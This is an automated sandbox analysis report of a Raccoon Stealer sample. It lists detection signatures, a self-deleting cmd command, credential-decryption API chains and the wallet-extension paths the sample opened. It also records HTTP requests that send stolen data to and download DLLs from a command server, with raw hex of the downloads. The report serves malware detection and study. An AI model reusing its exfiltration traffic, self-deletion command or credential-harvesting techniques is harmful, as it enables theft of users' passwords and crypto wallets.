Play interactive tour

Edit tour

Windows Analysis Report eLZzxG56uH.exe

Overview

General Information

Sample Name:	eLZzxG56uH.exe
Analysis ID:	491991
MD5:	82f7734fef8ee0789cf270f292651cbe
SHA1:	80db9b3c72f88b3cacb40362ee21baa2390de38c
SHA256:	9d8f04bd64b81ed3367def9f74a8a98e9a868f30db9433a9ef37b481394c9046
Tags:	exeRaccoonStealer
Infos:
Most interesting Screenshot:

Detection

Raccoon

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Yara detected Raccoon Stealer

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Contains functionality to steal Internet Explorer form passwords

Machine Learning detection for sample

Self deletion via cmd delete

Tries to detect virtualization through RDTSC time measurements

Found many strings related to Crypto-Wallets (likely being stolen)

Tries to steal Mail credentials (via file access)

Tries to harvest and steal browser information (history, passwords, etc)

PE file contains section with special chars

Uses 32bit PE files

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Downloads executable code via HTTP

Entry point lies outside standard sections

Creates a DirectInput object (often for capturing keystrokes)

Is looking for software installed on the system

PE file does not import any functions

Sample file is different than original file name gathered from version info

Extensive use of GetProcAddress (often used to hide API calls)

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Binary contains a suspicious time stamp

PE file contains more sections than normal

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

eLZzxG56uH.exe (PID: 3340 cmdline: 'C:\Users\user\Desktop\eLZzxG56uH.exe' MD5: 82F7734FEF8EE0789CF270F292651CBE)

cmd.exe (PID: 5316 cmdline: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\eLZzxG56uH.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 2884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

timeout.exe (PID: 2532 cmdline: timeout /T 10 /NOBREAK MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)

conhost.exe (PID: 3460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
Process Memory Space: eLZzxG56uH.exe PID: 3340	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.eLZzxG56uH.exe.1c0000.0.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: eLZzxG56uH.exe	Virustotal: Detection: 23%			Perma Link
Source: eLZzxG56uH.exe	ReversingLabs: Detection: 22%

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: 0.2.eLZzxG56uH.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: eLZzxG56uH.exe PID: 3340, type: MEMORYSTR

Machine Learning detection for sample

Show sources

Source: eLZzxG56uH.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_001EA130 lstrlenW,lstrlenW,lstrlenW,CredEnumerateW,CryptUnprotectData,LocalFree,CredFree,	0_2_001EA130
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_001E9F5D CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfW,lstrcatW,wsprintfW,lstrcatW,CryptDestroyHash,CryptReleaseContext,lstrlenW,CryptUnprotectData,LocalFree,	0_2_001E9F5D
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_001F4A5F lstrlenW,lstrlenW,lstrlenW,CryptUnprotectData,LocalFree,lstrlenW,lstrlenW,lstrlenW,wsprintfA,lstrlenA,	0_2_001F4A5F
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_001E0F09 __EH_prolog,_strlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,PK11_FreeSlot,	0_2_001E0F09

Source: eLZzxG56uH.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: unknown

HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49743 version: TLS 1.2

Source: eLZzxG56uH.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.0.dr
Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: eLZzxG56uH.exe, 00000000.00000002.317091728.000000006EBC0000.00000002.00020000.sdmp, nss3.dll.0.dr
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.0.dr
Source:	Binary string: ucrtbase.pdb source: ucrtbase.dll.0.dr
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdb source: api-ms-win-core-memory-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.0.dr
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.0.dr
Source:	Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: eLZzxG56uH.exe, 00000000.00000002.316625537.000000006EAB9000.00000002.00020000.sdmp, mozglue.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.0.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.0.dr
Source:	Binary string: msvcp140.i386.pdb source: msvcp140.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy.dll.0.dr
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.0.dr
Source:	Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.0.dr
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.0.dr
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.0.dr
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: eLZzxG56uH.exe, 00000000.00000002.316625537.000000006EAB9000.00000002.00020000.sdmp, mozglue.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.0.dr
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr
Source:	Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source:	Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.0.dr
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.0.dr
Source:	Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.0.dr
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: AccessibleMarshal.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.0.dr
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.0.dr
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.0.dr

Source: C:\Users\user\Desktop\eLZzxG56uH.exe

Code function: 0_2_001FEFDD FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,

0_2_001FEFDD

Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\	Jump to behavior

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.3:49744 -> 185.138.164.150:80

Source: Joe Sandbox View

ASN Name: DEPTELECOMNSO-ASRU DEPTELECOMNSO-ASRU

Source: Joe Sandbox View

JA3 fingerprint: ce5f3254611a8c095a3d821d44539877

Source: global traffic	HTTP traffic detected: GET /tika31ramencomp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: t.me
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 185.138.164.150
Source: global traffic	HTTP traffic detected: GET //l/f/-pEuK3wB3dP17SpzG6pB/21cbbf099c71cc43b2b903c1329c99a4ee8b02a9 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.138.164.150
Source: global traffic	HTTP traffic detected: GET //l/f/-pEuK3wB3dP17SpzG6pB/7320aabda7ae3fb6c8f203b55593b70ca4e3db6f HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.138.164.150
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cVContent-Length: 54992Host: 185.138.164.150

Source: Joe Sandbox View

IP Address: 185.138.164.150 185.138.164.150

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 28 Sep 2021 06:53:34 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 28 Sep 2021 06:53:37 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-2b281b"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8

Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
